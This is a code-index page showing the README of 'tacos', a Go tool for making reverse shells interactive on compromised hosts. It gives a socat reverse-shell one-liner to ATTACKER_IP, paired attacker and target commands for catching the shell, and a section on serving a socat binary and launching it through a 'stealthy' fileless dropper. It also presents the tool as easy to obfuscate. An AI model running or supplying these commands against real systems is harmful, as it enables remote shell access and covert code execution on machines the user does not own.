MCPcopy Index your code
hub / github.com/ariary/tacos

github.com/ariary/tacos @v2.0.0

Chat with this repo
repository ↗ · DeepWiki ↗ · release v2.0.0 ↗ · + Follow
5 symbols 16 edges 3 files 4 documented · 80% updated 52d agov1.4.0 · 2026-05-18★ 335 open issues

Browse by type

Functions 5 Types & classes 0
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

tacos 🌮

(reverse socat)

Spawn a pty in your reverse shell to automaticaly make it interactive for socat listener.

Fast interactive reverse shell set-up 🐳 (container)

All credit goes to laluka idea

Equivalent of:

socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0

Why ? * too lazy to copy/paste/learn socat command * target doesn't have socat and you don't want to do this * provide more advanced configuration to the tty (alias, etc) * easier to obfuscate * cross-platform (windows support is OK but not yet interactive. It is recommended to use non-docker solution for it) * tired of hitting ^C and loosing your shell?

Usage

tacos is built to work with the simple and dramatically effective project pty4all:

# On attacker machine
tmux
./light-pty4all/socat-listener.sh --lhost [ATTACKER_IP] --lport [ATTACKER_PORT] #multi-handler

# On target (transfer tacos as you wish)
./tacos [ATTACKER_IP]:[ATTACKER_PORT]       # or .\tacos.exe [ATTACKER_IP]:[ATTACKER_PORT] for windows
# 💥

With docker (recommended)

Source aliases (for simplicity):

alias tacos.container='docker run --net host --rm -it ariary/tacos'

Launch multi-handler listener:

tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]

Notes about container security:

From a networking point of view, this is the same level of isolation as if the process were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.

Install

Release

curl -lO -L -s https://github.com/ariary/tacos/releases/latest/download/tacos && chmod +x tacos

From git

need go:

git clone https://github.com/ariary/tacos.git && cd tacos
make before.build
make build.tacos          # or make build.tacos.windows

Alternative

Alternatively, if target does not have socat: Host a static version of socat binary and download + execute it using the stealthy filess-xec dropper:

# On attacker machine
# get socat static & expose it
get-static socat
python3 -m http.server 8080

# On target machine
# Use already downloaded fileless-xec to download socat and stealthy launch it with argument
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:443,verify=0

Core symbols most depended-on inside this repo

Shape

Function 5

Languages

Go100%

Modules by API surface

pkg/tacos/tacos_windows.go2 symbols
pkg/tacos/tacos.go2 symbols
cmd/tacos/tacos.go1 symbols

For agents

$ claude mcp add tacos \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact

Ask about this repo answers extend the page